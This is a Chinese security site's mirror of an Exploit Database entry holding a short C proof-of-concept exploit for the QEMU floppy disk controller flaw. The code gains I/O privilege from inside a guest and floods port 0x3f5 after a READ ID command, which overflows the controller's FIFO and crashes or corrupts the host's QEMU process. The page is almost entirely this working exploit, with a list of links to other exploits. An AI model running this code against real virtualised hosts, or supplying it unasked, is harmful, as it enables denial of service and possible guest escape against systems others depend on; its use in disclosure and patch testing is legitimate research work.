体验盒子
  • 博文
  • 设计开发
  • 网络安全
  • 观点
  • 服务
  • AI导航
  • 更多
    • 关于
    • 分享
    • 老电影
    • 搜索语法/SHDB
    • Exploits
    • SecTools
    • UserAgent解析
    • 地理坐标在线转换

QEMU – Floppy Disk Controller (FDC) (PoC)

  • Exploit Database
  • 127 阅读
  • 作者: Marcus Meissner
    日期: 2015-05-18
  • 类别:
    • dos
    平台:
    • multiple
  • 来源:https://www.exploit-db.com/exploits/37053/
  • 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    // Source: https://marc.info/?l=oss-security&m=143155206320935&w=2
     
    #include <sys/io.h>
     
    #define FIFO 0x3f5
     
    int main() {
    int i;
    iopl(3);
     
    outb(0x0a,0x3f5); /* READ ID */
    for (i=0;i<10000000;i++)
    outb(0x42,0x3f5); /* push */
    }
     
上一篇: Burning Board < 2.3.1 - SQL Injection
下一篇: Microsoft Windows 8.0/8.1 (x64) – ‘TrackPopupMenu’ Local Privilege Escalation (MS14-058)
  • last Exploits
  • QEMU – Floppy Disk Controller (FDC) (PoC)的更多信息
  • Apple Safari 4.0.4 (531.21.10) – Stack Overflow / Denial of Service:
  • Adobe Flash – Color.setTransform Use-After-Free:
  • VBScript 5.8.7600.16385/5.8.9600.16384 – RegExpComp::PnodeParse Out-of-Bounds Read:
  • Multiple Browsers – Address bar Characters:
  • MiniUPnP 1.4 – Multiple Denial of Service Vulnerabilities:
  • BWMeter 5.4.0 – ‘.csv’ Denial of Service:
  • Cogent DataHub 7.1.1.63 – Stack Overflow:
  • WM Recorder 16.8.1 – Denial of Service:
体验盒子
  • 关于
  • 博文
  • 分享
  • 存档
  • 服务
体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。

2024 体验盒子, 滇ICP备15006848号-1

扫码分享

网络安全
验证:体验盒子
扫码分享
网络安全
打赏零钱
  • 支付宝打赏
  • 微信打赏